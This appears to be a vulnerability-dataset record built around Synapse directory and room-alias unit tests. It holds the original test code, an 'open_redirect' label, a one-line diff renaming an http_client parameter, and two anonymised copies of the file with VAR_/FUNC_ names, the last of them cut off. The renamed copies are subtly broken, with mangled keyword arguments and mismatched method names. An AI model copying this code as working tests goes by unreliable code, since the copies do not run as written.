"""A user that doesn't meet the expected guidelines cannot delete an alias."""
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def test_delete_alias_creator(self):
"""An alias creator can delete their own alias."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_admin(self):
"""A server admin can delete an alias created by another user."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias as the admin.
result = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_sufficient_power(self):
"""A user with a sufficient power level should be able to delete an alias."""
self._create_alias(self.admin_user)
# Increase the user's power level.
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
# They can now delete the alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CanonicalAliasTestCase(unittest.HomeserverTestCase):
"""Test modifications of the canonical alias when delete aliases.
"""
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def _add_alias(self, alias: str) -> RoomAlias:
"""Add an alias to the test room."""
room_alias = RoomAlias.from_string(alias)
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
room_alias, self.room_id, ["test"], self.admin_user
)
)
return room_alias
def _set_canonical_alias(self, content):
"""Configure the canonical alias state on the room."""
self.helper.send_state(
self.room_id, "m.room.canonical_alias", content, tok=self.admin_user_tok,
)
def _get_canonical_alias(self):
"""Get the canonical alias state of the room."""
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def test_remove_alias(self):
"""Removing an alias that is the canonical alias should remove it there too."""
# Set this new alias as the canonical alias for this room
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
# Finally, delete the alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
data = self._get_canonical_alias()
self.assertNotIn("alias", data["content"])
self.assertNotIn("alt_aliases", data["content"])
def test_remove_other_alias(self):
"""Removing an alias listed as in alt_aliases should remove it there too."""
# Create a second alias.
other_test_alias = "#test2:test"
other_room_alias = self._add_alias(other_test_alias)
# Set the alias as the canonical alias for this room.
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, other_test_alias],
}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(
data["content"]["alt_aliases"], [self.test_alias, other_test_alias]
)
# Delete the second alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), other_room_alias
)
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
class TestCreateAliasACL(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
# We cheekily override the config to add custom alias creation rules
config = {}
config["alias_creation_rules"] = [
{"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
]
config["room_list_publication_rules"] = []
rd_config = RoomDirectoryConfig()
rd_config.read_config(config)
self.hs.config.is_alias_creation_allowed = rd_config.is_alias_creation_allowed
return hs
def test_denied(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(403, channel.code, channel.result)
def test_allowed(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23unofficial_test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(200, channel.code, channel.result)
class TestRoomListSearchDisabled(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(200, channel.code, channel.result)
self.room_list_handler = hs.get_room_list_handler()
self.directory_handler = hs.get_directory_handler()
return hs
def test_disabling_room_list(self):
self.room_list_handler.enable_room_list_search = True
self.directory_handler.enable_room_list_search = True
# Room list is enabled so we should get some results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) > 0)
self.room_list_handler.enable_room_list_search = False
self.directory_handler.enable_room_list_search = False
# Room list disabled so we should get no results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) == 0)
# Room list disabled so we shouldn't be allowed to publish rooms
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(403, channel.code, channel.result)
| open_redirect | {
"code": [
" http_client=None,"
],
"line_no": [
45
]
} | {
"code": [
" federation_http_client=None,"
],
"line_no": [
45
]
} |
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class CLASS_0(unittest.HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def FUNC_21(VAR_8, VAR_9):
self.query_handlers[VAR_8] = VAR_9
self.mock_registry.register_query_handler = FUNC_21
VAR_3 = self.setup_test_homeserver(
http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = VAR_3.get_directory_handler()
self.store = VAR_3.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return VAR_3
def FUNC_1(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
VAR_10 = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, VAR_10)
def FUNC_2(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
VAR_10 = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, VAR_10
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
VAR_8="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def FUNC_3(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
VAR_11 = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, VAR_11)
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.handler = VAR_3.get_directory_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
def FUNC_5(self):
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def FUNC_6(self):
VAR_12 = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, VAR_12,
),
synapse.api.errors.SynapseError,
)
def FUNC_7(self):
VAR_12 = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, VAR_12,
)
)
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.store = VAR_3.get_datastore()
self.handler = VAR_3.get_directory_handler()
self.state_handler = VAR_3.get_state_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
def FUNC_8(self, VAR_4):
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], VAR_4
)
)
def FUNC_9(self):
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def FUNC_10(self):
self._create_alias(self.test_user)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def FUNC_11(self):
self._create_alias(self.test_user)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def FUNC_12(self):
self._create_alias(self.admin_user)
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.store = VAR_3.get_datastore()
self.handler = VAR_3.get_directory_handler()
self.state_handler = VAR_3.get_state_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def FUNC_13(self, VAR_5: str) -> RoomAlias:
VAR_13 = RoomAlias.from_string(VAR_5)
self.get_success(
self.store.create_room_alias_association(
VAR_13, self.room_id, ["test"], self.admin_user
)
)
return VAR_13
def FUNC_14(self, VAR_6):
self.helper.send_state(
self.room_id, "m.room.canonical_alias", VAR_6, tok=self.admin_user_tok,
)
def FUNC_15(self):
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def FUNC_16(self):
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
VAR_14 = self._get_canonical_alias()
self.assertNotIn("alias", VAR_14["content"])
self.assertNotIn("alt_aliases", VAR_14["content"])
def FUNC_17(self):
VAR_15 = "#test2:test"
VAR_16 = self._add_alias(VAR_15)
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, VAR_15],
}
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(
VAR_14["content"]["alt_aliases"], [self.test_alias, VAR_15]
)
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), VAR_16
)
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
class CLASS_4(unittest.HomeserverTestCase):
    """Tests that alias_creation_rules from the room directory config are
    enforced when aliases are created through the client API."""

    # Bug fix: was VAR_7, but the test methods read ``self.user_id``
    # (framework attribute), so the anonymised name was never consulted.
    user_id = "@test:test"
    # NOTE(review): VAR_2 looks like the anonymised servlet-registration
    # attribute (``servlets``) read by the base class — confirm its name.
    VAR_2 = [directory.register_servlets, room.register_servlets]

    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        # Build a RoomDirectoryConfig that only allows aliases matching
        # "#unofficial_*" and install its check on the homeserver config.
        VAR_17 = {}
        # Bug fix: this previously assigned to an undefined global name
        # ``config`` instead of the local config dict, raising NameError.
        VAR_17["alias_creation_rules"] = [
            {"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
        ]
        VAR_17["room_list_publication_rules"] = []
        VAR_18 = RoomDirectoryConfig()
        VAR_18.read_config(VAR_17)
        self.hs.config.is_alias_creation_allowed = VAR_18.is_alias_creation_allowed
        return VAR_3

    def FUNC_18(self):
        # An alias not matching the allow rule is rejected with 403.
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT",
            b"directory/room/%23test%3Atest",
            ('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
        )
        self.assertEquals(403, VAR_21.code, VAR_21.result)

    def FUNC_19(self):
        # An alias matching "#unofficial_*" is permitted (200).
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT",
            b"directory/room/%23unofficial_test%3Atest",
            ('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
        )
        self.assertEquals(200, VAR_21.code, VAR_21.result)
class CLASS_5(unittest.HomeserverTestCase):
    """Tests toggling the public room-list search/publication at runtime."""

    # Bug fix: was VAR_7, but the methods read ``self.user_id`` (framework
    # attribute), so the anonymised name was never consulted.
    user_id = "@test:test"
    # NOTE(review): VAR_2 looks like the anonymised ``servlets`` attribute
    # read by the base class — confirm its name.
    VAR_2 = [directory.register_servlets, room.register_servlets]

    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        # Create a room and publish it to the public directory so the room
        # list is non-empty when searching is enabled.
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
        )
        self.assertEquals(200, VAR_21.code, VAR_21.result)
        self.room_list_handler = VAR_3.get_room_list_handler()
        self.directory_handler = VAR_3.get_directory_handler()
        return VAR_3

    def FUNC_20(self):
        # With search enabled, the published room shows up in /publicRooms.
        self.room_list_handler.enable_room_list_search = True
        self.directory_handler.enable_room_list_search = True
        VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
        self.assertEquals(200, VAR_21.code, VAR_21.result)
        self.assertTrue(len(VAR_21.json_body["chunk"]) > 0)
        # With search disabled, the room list comes back empty...
        self.room_list_handler.enable_room_list_search = False
        self.directory_handler.enable_room_list_search = False
        VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
        self.assertEquals(200, VAR_21.code, VAR_21.result)
        self.assertTrue(len(VAR_21.json_body["chunk"]) == 0)
        # ...and publishing another room to the directory is forbidden.
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
        )
        self.assertEquals(403, VAR_21.code, VAR_21.result)
|
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class CLASS_0(unittest.HomeserverTestCase):
    """Unit tests for the directory handler's alias lookup paths."""
    def FUNC_0(self, VAR_0, VAR_1):
        # Replace the federation client/registry with Mocks so we can
        # observe outgoing queries and register query handlers locally.
        self.mock_federation = Mock()
        self.mock_registry = Mock()
        self.query_handlers = {}
        def FUNC_21(VAR_8, VAR_9):
            # Capture handlers registered by the homeserver, keyed by name.
            self.query_handlers[VAR_8] = VAR_9
        self.mock_registry.register_query_handler = FUNC_21
        VAR_3 = self.setup_test_homeserver(
            federation_http_client=None,
            resource_for_federation=Mock(),
            federation_client=self.mock_federation,
            federation_registry=self.mock_registry,
        )
        self.handler = VAR_3.get_directory_handler()
        self.store = VAR_3.get_datastore()
        self.my_room = RoomAlias.from_string("#my-room:test")
        self.your_room = RoomAlias.from_string("#your-room:test")
        self.remote_room = RoomAlias.from_string("#another:remote")
        return VAR_3
    def FUNC_1(self):
        # A locally stored alias association is returned by get_association.
        self.get_success(
            self.store.create_room_alias_association(
                self.my_room, "!8765qwer:test", ["test"]
            )
        )
        VAR_10 = self.get_success(self.handler.get_association(self.my_room))
        self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, VAR_10)
    def FUNC_2(self):
        # A remote alias is resolved via a federation "directory" query.
        self.mock_federation.make_query.return_value = make_awaitable(
            {"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
        )
        VAR_10 = self.get_success(self.handler.get_association(self.remote_room))
        self.assertEquals(
            {"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, VAR_10
        )
        # NOTE(review): the keyword "VAR_8" below looks like an anonymization
        # artifact (originally the query-type keyword) — confirm it matches
        # the keyword actually used by the handler's make_query call.
        self.mock_federation.make_query.assert_called_with(
            destination="remote",
            VAR_8="directory",
            args={"room_alias": "#another:remote"},
            retry_on_dns_fail=False,
            ignore_backoff=True,
        )
    def FUNC_3(self):
        # Incoming federation directory queries resolve local aliases.
        self.get_success(
            self.store.create_room_alias_association(
                self.your_room, "!8765asdf:test", ["test"]
            )
        )
        VAR_11 = self.get_success(
            self.handler.on_directory_query({"room_alias": "#your-room:test"})
        )
        self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, VAR_11)
class CLASS_1(unittest.HomeserverTestCase):
    """Tests around who may *create* an alias for a room."""
    # NOTE(review): VAR_2 looks like the anonymised ``servlets`` attribute
    # read by the test base class — confirm its name.
    VAR_2 = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
        room.register_servlets,
        directory.register_servlets,
    ]
    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        # One admin-owned room; a second, non-admin user joins it.
        self.handler = VAR_3.get_directory_handler()
        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")
        self.room_id = self.helper.create_room_as(
            self.admin_user, tok=self.admin_user_tok
        )
        self.test_alias = "#test:test"
        self.room_alias = RoomAlias.from_string(self.test_alias)
        self.test_user = self.register_user("user", "pass", admin=False)
        self.test_user_tok = self.login("user", "pass")
        # NOTE(review): "VAR_4=" looks like an anonymised keyword (likely
        # the joining user) — confirm against the helper's signature.
        self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
    def FUNC_5(self):
        # A room member may create an alias for that room.
        self.get_success(
            self.handler.create_association(
                create_requester(self.test_user), self.room_alias, self.room_id,
            )
        )
    def FUNC_6(self):
        # A user may NOT create an alias for a room they are not in.
        VAR_12 = self.helper.create_room_as(
            self.admin_user, tok=self.admin_user_tok
        )
        self.get_failure(
            self.handler.create_association(
                create_requester(self.test_user), self.room_alias, VAR_12,
            ),
            synapse.api.errors.SynapseError,
        )
    def FUNC_7(self):
        # A server admin may create an alias for any room.
        VAR_12 = self.helper.create_room_as(
            self.test_user, tok=self.test_user_tok
        )
        self.get_success(
            self.handler.create_association(
                create_requester(self.admin_user), self.room_alias, VAR_12,
            )
        )
class CLASS_2(unittest.HomeserverTestCase):
    """Tests around who may *delete* an alias."""
    # NOTE(review): VAR_2 looks like the anonymised ``servlets`` attribute
    # read by the test base class — confirm its name.
    VAR_2 = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
        room.register_servlets,
        directory.register_servlets,
    ]

    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        # One admin-owned room; a second, non-admin user joins it.
        self.store = VAR_3.get_datastore()
        self.handler = VAR_3.get_directory_handler()
        self.state_handler = VAR_3.get_state_handler()
        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")
        self.room_id = self.helper.create_room_as(
            self.admin_user, tok=self.admin_user_tok
        )
        self.test_alias = "#test:test"
        self.room_alias = RoomAlias.from_string(self.test_alias)
        self.test_user = self.register_user("user", "pass", admin=False)
        self.test_user_tok = self.login("user", "pass")
        # NOTE(review): "VAR_4=" looks like an anonymised keyword (likely
        # the joining user) — confirm against the helper's signature.
        self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)

    def _create_alias(self, VAR_4):
        """Write the test alias association to the store, owned by *VAR_4*.

        Bug fix: this helper was defined as FUNC_8 while every call site in
        this class invokes ``self._create_alias``, which raised
        AttributeError. Restored the called name.
        """
        self.get_success(
            self.store.create_room_alias_association(
                self.room_alias, self.room_id, ["test"], VAR_4
            )
        )

    def FUNC_9(self):
        # A regular user may not delete somebody else's alias.
        self._create_alias(self.admin_user)
        self.get_failure(
            self.handler.delete_association(
                create_requester(self.test_user), self.room_alias
            ),
            synapse.api.errors.AuthError,
        )

    def FUNC_10(self):
        # A user may delete their own alias; afterwards lookups fail.
        self._create_alias(self.test_user)
        VAR_10 = self.get_success(
            self.handler.delete_association(
                create_requester(self.test_user), self.room_alias
            )
        )
        self.assertEquals(self.room_id, VAR_10)
        self.get_failure(
            self.handler.get_association(self.room_alias),
            synapse.api.errors.SynapseError,
        )

    def FUNC_11(self):
        # A server admin may delete another user's alias.
        self._create_alias(self.test_user)
        VAR_10 = self.get_success(
            self.handler.delete_association(
                create_requester(self.admin_user), self.room_alias
            )
        )
        self.assertEquals(self.room_id, VAR_10)
        self.get_failure(
            self.handler.get_association(self.room_alias),
            synapse.api.errors.SynapseError,
        )

    def FUNC_12(self):
        # A user granted sufficient power level (100 via m.room.power_levels)
        # may delete an alias they do not own.
        self._create_alias(self.admin_user)
        self.helper.send_state(
            self.room_id,
            "m.room.power_levels",
            {"users": {self.test_user: 100}},
            tok=self.admin_user_tok,
        )
        VAR_10 = self.get_success(
            self.handler.delete_association(
                create_requester(self.test_user), self.room_alias
            )
        )
        self.assertEquals(self.room_id, VAR_10)
        self.get_failure(
            self.handler.get_association(self.room_alias),
            synapse.api.errors.SynapseError,
        )
class CLASS_3(unittest.HomeserverTestCase):
    """Tests that deleting an alias also cleans up m.room.canonical_alias."""
    # NOTE(review): VAR_2 looks like the anonymised ``servlets`` attribute
    # read by the test base class — confirm its name.
    VAR_2 = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
        room.register_servlets,
        directory.register_servlets,
    ]

    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        self.store = VAR_3.get_datastore()
        self.handler = VAR_3.get_directory_handler()
        self.state_handler = VAR_3.get_state_handler()
        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")
        self.room_id = self.helper.create_room_as(
            self.admin_user, tok=self.admin_user_tok
        )
        self.test_alias = "#test:test"
        self.room_alias = self._add_alias(self.test_alias)

    # Bug fix for the three helpers below: they were defined as
    # FUNC_13/FUNC_14/FUNC_15 while every call site uses the underscore
    # names, which raised AttributeError. Restored the called names.

    def _add_alias(self, VAR_5: str) -> RoomAlias:
        """Register *VAR_5* as an alias for the test room and return it."""
        VAR_13 = RoomAlias.from_string(VAR_5)
        self.get_success(
            self.store.create_room_alias_association(
                VAR_13, self.room_id, ["test"], self.admin_user
            )
        )
        return VAR_13

    def _set_canonical_alias(self, VAR_6):
        """Set the room's m.room.canonical_alias content to *VAR_6*."""
        self.helper.send_state(
            self.room_id, "m.room.canonical_alias", VAR_6, tok=self.admin_user_tok,
        )

    def _get_canonical_alias(self):
        """Return the current m.room.canonical_alias state event."""
        return self.get_success(
            self.state_handler.get_current_state(
                self.room_id, EventTypes.CanonicalAlias, ""
            )
        )

    def FUNC_16(self):
        # Deleting the alias scrubs both "alias" and "alt_aliases".
        self._set_canonical_alias(
            {"alias": self.test_alias, "alt_aliases": [self.test_alias]}
        )
        VAR_14 = self._get_canonical_alias()
        self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
        self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
        self.get_success(
            self.handler.delete_association(
                create_requester(self.admin_user), self.room_alias
            )
        )
        VAR_14 = self._get_canonical_alias()
        self.assertNotIn("alias", VAR_14["content"])
        self.assertNotIn("alt_aliases", VAR_14["content"])

    def FUNC_17(self):
        # Deleting one of two aliases only strips that entry.
        VAR_15 = "#test2:test"
        VAR_16 = self._add_alias(VAR_15)
        self._set_canonical_alias(
            {
                "alias": self.test_alias,
                "alt_aliases": [self.test_alias, VAR_15],
            }
        )
        VAR_14 = self._get_canonical_alias()
        self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
        self.assertEqual(
            VAR_14["content"]["alt_aliases"], [self.test_alias, VAR_15]
        )
        self.get_success(
            self.handler.delete_association(
                create_requester(self.admin_user), VAR_16
            )
        )
        VAR_14 = self._get_canonical_alias()
        self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
        self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
class CLASS_4(unittest.HomeserverTestCase):
    """Tests that alias_creation_rules from the room directory config are
    enforced when aliases are created through the client API."""

    # Bug fix: was VAR_7, but the test methods read ``self.user_id``
    # (framework attribute), so the anonymised name was never consulted.
    user_id = "@test:test"
    # NOTE(review): VAR_2 looks like the anonymised ``servlets`` attribute
    # read by the base class — confirm its name.
    VAR_2 = [directory.register_servlets, room.register_servlets]

    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        # Build a RoomDirectoryConfig that only allows aliases matching
        # "#unofficial_*" and install its check on the homeserver config.
        VAR_17 = {}
        # Bug fix: this previously assigned to an undefined global name
        # ``config`` instead of the local config dict, raising NameError.
        VAR_17["alias_creation_rules"] = [
            {"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
        ]
        VAR_17["room_list_publication_rules"] = []
        VAR_18 = RoomDirectoryConfig()
        VAR_18.read_config(VAR_17)
        self.hs.config.is_alias_creation_allowed = VAR_18.is_alias_creation_allowed
        return VAR_3

    def FUNC_18(self):
        # An alias not matching the allow rule is rejected with 403.
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT",
            b"directory/room/%23test%3Atest",
            ('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
        )
        self.assertEquals(403, VAR_21.code, VAR_21.result)

    def FUNC_19(self):
        # An alias matching "#unofficial_*" is permitted (200).
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT",
            b"directory/room/%23unofficial_test%3Atest",
            ('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
        )
        self.assertEquals(200, VAR_21.code, VAR_21.result)
class CLASS_5(unittest.HomeserverTestCase):
    """Tests toggling the public room-list search/publication at runtime."""

    # Bug fix: was VAR_7, but the methods read ``self.user_id`` (framework
    # attribute), so the anonymised name was never consulted.
    user_id = "@test:test"
    # NOTE(review): VAR_2 looks like the anonymised ``servlets`` attribute
    # read by the base class — confirm its name.
    VAR_2 = [directory.register_servlets, room.register_servlets]

    def FUNC_4(self, VAR_0, VAR_1, VAR_3):
        # Create a room and publish it to the public directory so the room
        # list is non-empty when searching is enabled.
        VAR_19 = self.helper.create_room_as(self.user_id)
        VAR_20, VAR_21 = self.make_request(
            "PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
        )
        self.assertEquals(200, VAR_21.code, VAR_21.result)
        self.room_list_handler = VAR_3.get_room_list_handler()
        self.directory_handler = VAR_3.get_directory_handler()
        return VAR_3

    def FUNC_20(self):
        # With search enabled, the published room shows up in /publicRooms.
        self.room_list_handler.enable_room_list_search = True
        self.directory_handler.enable_room_list_search = True
        VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
        self.assertEquals(200, VAR_21.code, VAR_21.result)
        self.assertTrue(len(VAR_21.json_body["chunk"]) > 0)
        # With search disabled, the room list comes back empty...
        self.room_list_handler.enable_room_list_search = False
        self.directory_handler.enable_room_list_search = False
